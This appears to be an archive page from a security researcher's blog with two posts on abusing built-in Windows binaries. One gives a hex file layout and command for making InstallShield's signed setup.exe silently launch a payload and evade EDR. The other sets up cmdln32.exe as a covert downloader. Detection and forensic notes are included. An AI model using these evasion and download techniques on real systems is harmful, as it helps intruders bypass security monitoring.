You are browsing the archive for Archaeology.

Beating shields of EDR with the 16-bit setup

October 14, 2017 in Anti-Forensics, Archaeology, Compromise Detection, File Formats ZOO, Forensic Analysis, Living off the land, Malware Analysis

This is probably the most bizarre way of breaking the process tree you will see today, but well, it works, so there you go…

Have you ever wondered what these guys are?

  • C:\Windows\System32\InstallShield\setup.exe
  • C:\Windows\SysWOW64\InstallShield\setup.exe

Yup, me neither – until today.

Turns out that this is a very old school InstallShield setup program.

It has an interesting property that it is signed and exists on lots of versions of Windows.

It turns out that you can use it for at least two different purposes.

  • Side-load _setup.dll it relies on (signed .exe loading unsigned DLL)
  • Spawn .exe of your choice, breaking the process tree in a very lame way

The first one is trivial.

The second one is the really weird one – we have to create a fake setup directory layout that will allow us to execute program of our choice.

We need these files to pull it off:

  • _inst32i.ex_
    • the binary that is required by setup.exe; after toying around with an existing _inst32i.ex_ file from some old installation I came up with this minimalistic file layout that you need to save as _inst32i.ex_
00 : 2A AB 79 D8 00 01 00 00 00 00 00 00 00 00 00 00 *.y............. 000
10 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 016
20 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 032
30 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 048
40 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 ................ 064
50 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 080
60 : 00 00 00 00 00 00 0B 00 49 4E 53 54 41 4C 4C 2E ........INSTALL. 096
70 : 45 58 45 01 00 58 00 00 00 00 00 00 00 00 00 00 EXE..X.......... 112
80 : 00 00 00 00 00 00 00 00 00 00 09 00 7A 64 61 74 ............zdat 128
90 : 61 2E 64 6C 6C 01 00 5A 00 00 00 00 00 00 00 00 a.dll..Z........ 144
A0 : 00 00 00 00 00 00 00 00 00 00 00 00 0B 00 57 55 ..............WU 160
B0 : 54 4C 39 35 69 2E 44 4C 4C 01 00 58 00 00 00 00 TL95i.DLL..X.... 176
C0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 192
D0 : 0A 00 42 4F 4F 54 31 36 2E 45 58 45 01 00 58    ..BOOT16.EXE..X  208
  • _setup.dll
    • already on the system
  • layout.bin
    • just type “echo > layout.bin”
  • setup.exe
    • already on the system, signed
  • SETUP.LID
[Languages]
key0=0009
Default=0009
count=1

Finally, the payload – save it inside this file:

  • xtract_all.exe

or, make xtract_all.exe a dummy and store the payload inside the  _isdel.exe file.

Now, all you have to do is to run:

setup.exe /extract_all /s

This will execute setup.exe in a silent mode, and will force it to launch both xtract_all.exe and _isdel.exe.

Interestingly, the _isdel.exe is launched from the same directory, but xtract_all.exe will be executed from the %TEMP% directory.

Yup. It’s complicated, I told you 😉

This can be taken a step further. Instead of using the /extract_all trick, you can actually generate your own _inst32i.ex_ file that may hold the payload. Since it’s an old proprietary InstallShield package file format, it is unlikely its content is scanned for malware. To generate a payload you may either use an InstallShield installer (if you can find one!), or.. reverse engineer the package file format…

The Archaeologologogology #3 – Downloading stuff with cmdln32

April 30, 2017 in Archaeology, Living off the land, Reversing

One of the less-known tools residing in Windows system32 directory is cmdln32.exe. It is being used by CMAK (Connection Manager Administration Kit) to set up Connection Manager service profiles. The profile is typically packaged into an .exe that can be deployed to the user system. The package installs the profile that can be used to launch a Dial-up/VPN connection.

On older versions of Windows f.ex. XP you could fool cmdln32.exe to act as a simple downloader.

You can create 3 files:

  • A profile file
    [Profile Format]
    
    Version=4
    
    [Connection Manager]
    
    CMSFile=<settings file name - described next>
  • A settings file
    [Connection Manager]
    
    TunnelFile=<tunnel file name - described next>
  • A tunnel file
    [Settings]
    
    UpdateUrl=URL pointing to the file

The file that UpdateUrl points to needs to start with a [VPN Servers] Profile Section, followed by the actual data  f.ex.:

[VPN Servers]
This could be anything...

All you have to do now is to launch cmdl32.exe passing to it a full path to the profile file and providing a VPN argument f.ex.:

cmdln32 c:\test\profile /vpn

The program will read the profile file, then read the file name of the settings file; then read the settings file and extract the file name of the VPN tunnel file, and finally from the VPN file it will retrieve the URL for the update. Once downloaded, the file that the UpdateUrl location point to will replace the tunnel file (overwrite).

If it sounds complicated, it definitely is :), but it works and such download could potentially fly under radar of security products.

The request sent by the tool looks as follows:

GET / HTTP/1.1
User-Agent: Microsoft(R) Connection Manager Vpn File Update
Host: <domain>

So it’s easy to look for it in the logs. The version of the tool that is used on newer versions of Windows is a bit more careful. It checks if the RAS connection provided in the settings file is present (note, in my example the RAS connection is not listed inside the settings file) and only if it does, the tool continues. The alternative to the VPN download is the PhoneBook download, but this also requires the presence of the RAS connection. You can read about Connection Manager Tools and Settings on the Microsoft web page from 2003.

If you have a spare XP box you can test this functionality by downloading this package, placing its content inside c:\test and launching the cmdl32.exe via the following command:

cmdln32 c:\test\cmdl32_xp.cmp /vpn

Will this still work on newer versions?

I don’t know, but here are two ideas:

  • As long as _some_ program can be smuggled in to the victim’s system (f.ex. from the malicious attachment) it could launch cmdln32.exe under control of custom debugger and patch the RAS Enumeration check during run-time
  • Perhaps it’s possible to find a configuration where the RAS Enumeration check will work and knowing the RAS connection’s name one could set up a profile that would allow the download

In terms of forensics, you may find the following file inside the %TEMP% folder (XP-only):

  • %Temp%\VPN<random>.tmp

In any case, it’s just a trivia – it cannot really become a replacement for BITS…